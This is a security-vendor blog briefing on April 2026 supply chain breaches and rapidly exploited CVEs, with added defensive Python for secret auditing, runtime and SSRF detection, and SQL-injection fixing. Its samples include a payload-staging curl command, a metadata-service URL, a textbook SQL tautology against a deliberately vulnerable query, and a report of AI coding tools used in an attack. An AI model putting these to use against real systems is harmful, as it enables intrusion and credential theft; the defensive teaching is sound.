Security briefing: April 2026
Crystal Morin · 2026-05-05 · via Sysdig Blog

Does your infrastructure have trust issues?

Supply chain failure is the gift that keeps on giving, or should I say taking? The vulnerabilities, the exploitation, the breaches…these are inevitable, we know that. None of these are surprising anymore. The need for an “assume breach” mindset has become all too real. 

In April, trusted platforms like GitHub, HuggingFace, n8n, and Vercel became playgrounds for high-speed credential theft and lateral movement. Let’s dig into this month’s Security Briefing:

Apr 19: Vercel OAuth supply chain pivot

  • The attacker used a compromised OAuth app to move from the initial breach at context.ai to a Vercel employee’s account. 
  • While sensitive environment variables were encrypted, the attacker was able to scrape API keys and passwords left in non-sensitive fields by enumerating accessible projects. Oops. 
  • Vercel revoked the malicious OAuth app, invalidated tokens, and advised customers to rotate credentials and hunt for signs of a breach. 
  • Unfortunately, this incident highlights a common misconfiguration failure and reinforces the fact that identity remains the weakest link in otherwise well-secured environments. 
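The Vercel incident turned on API keys and passwords sitting in environment variables that were never marked sensitive, so they were stored in the clear. The following is an added example (not Vercel's or Sysdig's code) of the audit a defender can run over a project's exported variables: it flags values that match a known credential format, key names that usually hold credentials, and long high-entropy strings. The record shape (dicts with `key`, `value`, `sensitive`) and the sample export are constructed assumptions.

```python
"""Flag secrets stored in 'non-sensitive' project environment variables.

Added example, not Vercel's or Sysdig's code. The record format below
(a list of dicts with 'key', 'value', 'sensitive') is an assumption;
adapt it to whatever your platform's API actually returns.
"""
import math
import re
from collections import Counter

# Well-known public credential formats. The AKIA and ghp_ prefixes are the
# documented formats for AWS access key IDs and GitHub personal access tokens.
KNOWN_FORMATS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}

# Key names that usually hold credentials even when the value has no fixed format.
SUSPICIOUS_NAME = re.compile(r"(secret|token|password|passwd|api_?key|private)", re.I)


def shannon_entropy(s: str) -> float:
    """Bits per character; random API keys sit well above natural text and URLs."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def classify(var: dict) -> list[str]:
    """Return the reasons a non-sensitive variable looks like it holds a secret."""
    if var.get("sensitive"):
        return []  # already encrypted/masked by the platform; out of scope here
    value = str(var.get("value", ""))
    reasons = []
    for name, pattern in KNOWN_FORMATS.items():
        if pattern.search(value):
            reasons.append(f"matches {name} format")
    if SUSPICIOUS_NAME.search(var.get("key", "")):
        reasons.append("key name suggests a credential")
    # Long, space-free, high-entropy values are typical of generated keys.
    if len(value) >= 32 and " " not in value and shannon_entropy(value) > 4.5:
        reasons.append(f"high-entropy value ({shannon_entropy(value):.2f} bits/char)")
    return reasons


def audit(variables: list[dict]) -> dict[str, list[str]]:
    """Map variable key -> reasons for every flagged non-sensitive variable."""
    findings = {}
    for var in variables:
        reasons = classify(var)
        if reasons:
            findings[var["key"]] = reasons
    return findings


# Constructed sample export: one project's variables as a platform might return them.
# AKIAIOSFODNN7EXAMPLE is AWS's own documentation example key ID; the
# BUILD_CACHE_ID value is 32 distinct characters, chosen so its entropy is exactly 5.0.
SAMPLE_VARS = [
    {"key": "NEXT_PUBLIC_API_URL", "value": "https://api.example.com", "sensitive": False},
    {"key": "AWS_ACCESS_KEY_ID", "value": "AKIAIOSFODNN7EXAMPLE", "sensitive": False},
    {"key": "DB_PASSWORD", "value": "correct horse battery staple", "sensitive": False},
    {"key": "STRIPE_SECRET", "value": "sk_live_xxx", "sensitive": True},
    {"key": "BUILD_CACHE_ID", "value": "Ab0Cd1Ef2Gh3Ij4Kl5Mn6Op7Qr8St9Uv", "sensitive": False},
]

if __name__ == "__main__":
    for key, reasons in audit(SAMPLE_VARS).items():
        print(f"{key}: {'; '.join(reasons)}")
```

The entropy threshold is deliberately high so that URLs and hex-looking build identifiers do not drown the real findings; tune it against your own exports, and treat every hit as a candidate for moving into the platform's sensitive/encrypted storage and rotating.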

Apr 22: Trivy supply chain nightmare persists

  • As a result of the Trivy incident last month, a threat actor published malicious code on Checkmarx’s GitHub repositories on March 23. A month later, on April 22, malicious Docker images and other extensions of the Checkmarx KICS scanner image were published.
  • And to continue down the supply chain, a malicious Bitwarden CLI version was also published on April 22, though it was only exposed for 90 minutes.
  • Anyone who downloaded the malicious versions should assume breach, because for a short period of time, a security product was essentially shipping credential theft. Revert to known safe versions and quickly rotate credentials. 
  • The payloads in the malicious images harvested tokens, keys, and AI configurations, and then the stolen credentials were used to inject malware directly into the victims’ workflows in their own repositories. This is the nightmare that is a supply chain attack.

Mid-April: A dozen n8n vulnerabilities

  • Several moderate to critical vulnerabilities dropped in the n8n GitHub repository in mid-April, and they didn’t make it into a news cycle.
  • n8n is an extremely popular workflow automation platform, and users frequently store API keys, tokens, and secrets within it in order to automate SaaS workflows.
  • These vulnerabilities permit RCE, credential exposure, and privilege escalation and stem from flaws like improper input validation, SQL injection, and sandbox escape. Some of the attack paths require authenticated access, but this is hardly a barrier when instances are exposed, or credentials are weak or reused. 
  • Review the vulnerability list and make adjustments as necessary. Otherwise, this could get messy; successful exploitation could lead to widespread downstream impact across connected services within your organization.

Additional Sysdig TRT findings

Marimo vulnerability weaponized again and again

  • Less than 10 hours after a remote code execution vulnerability was disclosed for the marimo Python notebook tool, the Sysdig TRT was seeing active exploitation. 
  • CVE-2026-39987 is a pre-authentication RCE that lets an attacker obtain a shell through a WebSocket endpoint, with no credentials required.
  • This tool is by no means a household enterprise staple, with a fraction of the GitHub stars of Langflow or n8n. Still, several threat actors took full advantage of this Jupyter alternative and walked away with credentials. 
  • Less than a week after the first exploitation attempts were discovered, the Sysdig TRT found an attacker using a previously undocumented NKAbuse variant to deploy a blockchain botnet via HuggingFace.
  • Fortunately, existing runtime detections will trigger on several of the steps identified in the attacks using the marimo vulnerability. 
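The runtime detections mentioned above key on process behaviour rather than on the vulnerability itself: a notebook server should run kernels, not spawn interactive shells or downloaders. The following is an added example (not Falco's, marimo's or Sysdig's rule set) of that process-lineage check in plain Python over a constructed list of process-exec events; the event format, the process names and the sample events are assumptions.

```python
"""Runtime detection: shell or downloader spawned beneath a notebook server.

Added example, not Falco's or Sysdig's rule set; the exec-event format and
all sample events are constructed.
"""
from dataclasses import dataclass

NOTEBOOK_SERVERS = {"marimo", "jupyter-notebook", "jupyter-lab"}
SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget"}


@dataclass(frozen=True)
class ExecEvent:
    ts: int
    pid: int
    ppid: int
    comm: str      # executable name as the kernel reports it
    cmdline: str


def ancestors(event: ExecEvent, by_pid: dict):
    """Yield exec events up the parent chain, guarding against pid cycles."""
    cur = by_pid.get(event.ppid)
    seen = set()
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def detect(events):
    """Return (rule, pid, notebook_process) for every suspicious exec whose
    ancestry includes a notebook server process."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in sorted(events, key=lambda x: x.ts):
        chain = list(ancestors(e, by_pid))
        notebook = next((a for a in chain if a.comm in NOTEBOOK_SERVERS), None)
        if notebook is None:
            continue
        if e.comm in SHELLS:
            alerts.append(("shell_from_notebook", e.pid, notebook.comm))
        elif e.comm in DOWNLOADERS:
            alerts.append(("download_from_notebook", e.pid, notebook.comm))
    return alerts


# Constructed sample: a legitimate kernel, an attacker-style shell chain under
# the notebook server, and an unrelated ssh login shell that must not alert.
SAMPLE = [
    ExecEvent(1, 100, 1, "marimo", "marimo edit --host 0.0.0.0"),
    ExecEvent(2, 101, 100, "python", "python -c 'import pandas'"),
    ExecEvent(3, 102, 100, "sh", "sh -c 'id; uname -a'"),
    ExecEvent(4, 103, 102, "curl", "curl http://198.51.100.9/stage"),
    ExecEvent(5, 200, 1, "sshd", "sshd"),
    ExecEvent(6, 201, 200, "bash", "bash -l"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Notebooks do legitimately shell out (package installs, for instance), so in production this rule is a candidate for allow-listing known command lines or for correlating with an outbound connection from the child, rather than paging on every hit.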

LMDeploy LLM inference engine exploited

  • On April 22, the Sysdig TRT published a blog post on active exploitation attempts seen only 12 hours after the advisory for CVE-2026-33626 was released.
  • Yet another niche open source tool, LMDeploy serves vision-language models through an OpenAI-compatible HTTP API.
  • Within 8 minutes, an attacker used the Server-Side Request Forgery (SSRF) vulnerability to port scan the victim’s network and move through the cloud environment.
  • This kind of attack can be identified with runtime detection at both the application and host layers. 
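The two layers named above see different things: the application sees which URL it was asked to fetch, and the host sees the burst of connections that a scan produces. The following is an added example (not LMDeploy's or Sysdig's code) of both checks over constructed log lines; the log formats, the process name and the sample entries are assumptions.

```python
"""Two-layer detection for SSRF-driven internal reconnaissance.

Added example, not LMDeploy's or Sysdig's code. Both log formats are
constructed: an application log recording each URL the server was asked to
fetch, and a host connection log (timestamp, process, destination ip:port).
"""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlparse

# Hypothetical application log line: "<ts> fetch url=<url>"
APP_LINE = re.compile(r"^(?P<ts>\d+) fetch url=(?P<url>\S+)")
# Hypothetical host connection log line: "<ts> <proc> connect <ip>:<port>"
HOST_LINE = re.compile(r"^(?P<ts>\d+) (?P<proc>\S+) connect (?P<ip>[\d.]+):(?P<port>\d+)")


def is_internal_target(url: str) -> bool:
    """True if the URL points where a model server should never fetch from:
    loopback, RFC 1918 space, or link-local (cloud metadata at 169.254.169.254)."""
    host = urlparse(url).hostname
    if host is None:
        return False
    if host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # hostnames need resolving before this check; out of scope here
    return ip.is_private or ip.is_loopback or ip.is_link_local


def app_layer_findings(lines):
    """Application layer: fetch requests aimed at internal addresses."""
    hits = []
    for line in lines:
        m = APP_LINE.match(line)
        if m and is_internal_target(m["url"]):
            hits.append((int(m["ts"]), m["url"]))
    return hits


def host_layer_findings(lines, window=60, min_ports=10):
    """Host layer: one process touching >= min_ports distinct ports on one host
    within `window` seconds, the signature of a port scan."""
    per_target = defaultdict(list)  # (proc, ip) -> [(ts, port)]
    for line in lines:
        m = HOST_LINE.match(line)
        if m:
            per_target[(m["proc"], m["ip"])].append((int(m["ts"]), int(m["port"])))
    alerts = []
    for (proc, ip), events in per_target.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            ports = {p for t, p in events[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                alerts.append((proc, ip, len(ports)))
                break
    return alerts


# Constructed sample logs: one benign image fetch, two internal targets, and a
# 12-port sweep of one internal host by the serving process.
APP_LOG = [
    "1000 fetch url=https://images.example.com/cat.png",
    "1001 fetch url=http://169.254.169.254/latest/meta-data/",
    "1002 fetch url=http://10.0.3.7:6379/",
]
HOST_LOG = [f"{1010 + p} lmdeploy connect 10.0.3.7:{p}" for p in range(1, 13)] + [
    "1100 lmdeploy connect 52.1.2.3:443",
]

if __name__ == "__main__":
    print(app_layer_findings(APP_LOG))
    print(host_layer_findings(HOST_LOG))
```

The application-layer check is the cheaper one and catches the metadata-service case outright; the host-layer check is what still fires when the vulnerable code path does not log the URL at all.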

rclone vulnerability exploited

  • Sysdig TRT did not write a formal blog for CVE-2026-41179, but check out the LinkedIn post by team director Mike Clark. (We were concerned you might unsubscribe if we reported yet another internet-facing service breach in April…)
  • This vulnerability, like the two above, was also exploited in less than a day. 
  • Since rclone is frequently embedded in automation scripts and backup workflows, successful exploitation provides both immediate data access and persistence opportunities. 
  • With an unauthenticated single request via WebDAV, exploitation of this popular cloud storage tool could lead to extensive access, credential exposure, data exfiltration, or malware staging – basically anything. 

LiteLLM vulnerability targeted

  • In an interesting turn of events, considering how the rest of the month’s vulnerability exploitation went, a critical pre-authentication SQL injection flaw in LiteLLM was exploited 36 hours after it was disclosed.
  • Rather than the standard sqlmap spray against an SQL injection vulnerability, this attacker intentionally targeted high-value secret tables within LiteLLM’s schema. 
  • While the captured attack did not result in exfiltration, exploitation could result in stolen keys and credentials. 
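A pre-authentication SQL injection in a key lookup is exactly the case where the query runs before any identity is established, so the table of keys itself is what gets exposed. The following is an added example, not LiteLLM's code: the schema, the `api_keys` table and the lookup functions are constructed to show the class of bug beside its parameterised fix, not the actual flaw.

```python
"""API-key lookup: string-built (vulnerable) query beside the parameterised fix.

Added example, not LiteLLM's code. The api_keys table and both lookup
functions are constructed to illustrate the bug class, not the real flaw.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table holding two constructed keys, one of them privileged."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE api_keys (token TEXT PRIMARY KEY, owner TEXT, scope TEXT)")
    conn.executemany(
        "INSERT INTO api_keys VALUES (?, ?, ?)",
        [("sk-alice-EXAMPLE", "alice", "chat"), ("sk-admin-EXAMPLE", "admin", "*")],
    )
    return conn


def lookup_key_vulnerable(conn, presented_token: str):
    """'Before' form: the caller-controlled token is spliced into the SQL text,
    so a token containing a quote rewrites the WHERE clause. Do not use."""
    sql = f"SELECT owner, scope FROM api_keys WHERE token = '{presented_token}'"
    return conn.execute(sql).fetchall()


def lookup_key_safe(conn, presented_token: str):
    """Fixed form: the token is bound as a parameter and is never parsed as SQL."""
    return conn.execute(
        "SELECT owner, scope FROM api_keys WHERE token = ?", (presented_token,)
    ).fetchall()


def authenticate(conn, presented_token: str):
    """Authentication succeeds only on exactly one matching row."""
    rows = lookup_key_safe(conn, presented_token)
    return rows[0] if len(rows) == 1 else None


if __name__ == "__main__":
    conn = make_db()
    tautology = "' OR '1'='1"   # textbook always-true input
    print(lookup_key_vulnerable(conn, tautology))  # dumps every key owner in the table
    print(lookup_key_safe(conn, tautology))        # []
    print(authenticate(conn, "sk-alice-EXAMPLE"))  # ('alice', 'chat')
```

Parameter binding closes the injection; limiting the lookup to a single-row match, as `authenticate` does, is the second guard, so that even a future bug in query construction cannot turn "many rows" into a successful login.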

Also in the news

  • Mexican agencies hacked by AI: A single attacker used Claude Code and OpenAI’s GPT-4.1 to generate thousands of commands, resulting in access to hundreds of millions of personal records across 9 different government organizations. The attack was recently reported, but took place between December 2025 and February 2026. The scale of the attack is wild. 
  • Salesforce launches headless offering: On April 15, Salesforce introduced the next leap forward for all things AI, Salesforce Headless 360, built for agents. With this, there is no need to leave the window of your preferred CLI, and there are no limitations to what the output looks like – it’s in the hands of your imagination.
  • UK’s Cyber Security and Resilience Bill presses on: As of late April, the UK government stated the bill made it through a second reading and committee stage in the House of Commons. The significance of this bill is that it keeps critical services and suppliers at the forefront of security oversight, because supply chains are very much within the attack blast radius. 

Closing thoughts

So what do you do when you know it’s coming, but you don’t know where or how? Detect it fast and contain it faster. Speed and the element of surprise are the attacker’s advantages, and defenders are the ones who pay for them. But we aren’t talking about just supply chain risk anymore. These issues stem from our implicit trust in integrations, automation, and data paths. Attackers don’t need zero-days when poorly configured and over-permissioned automation sprawl is making their job easy. 

Remember this old warning: “Don’t trust everything you read on the internet”? Well, same idea. Don’t trust every tool because it plugs in nicely. If a tool can access secrets, move data, or trigger actions, it’s a high-priority part of your attack surface. Don’t stop using these tools, just watch them closely.
